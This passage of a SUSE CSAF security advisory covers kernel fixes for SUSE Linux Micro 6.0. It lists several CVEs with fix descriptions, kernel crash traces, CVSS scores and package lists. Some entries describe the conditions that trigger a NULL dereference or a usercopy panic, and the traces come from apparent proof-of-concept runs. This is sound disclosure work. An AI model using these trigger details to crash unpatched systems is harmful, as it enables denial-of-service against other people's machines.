trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
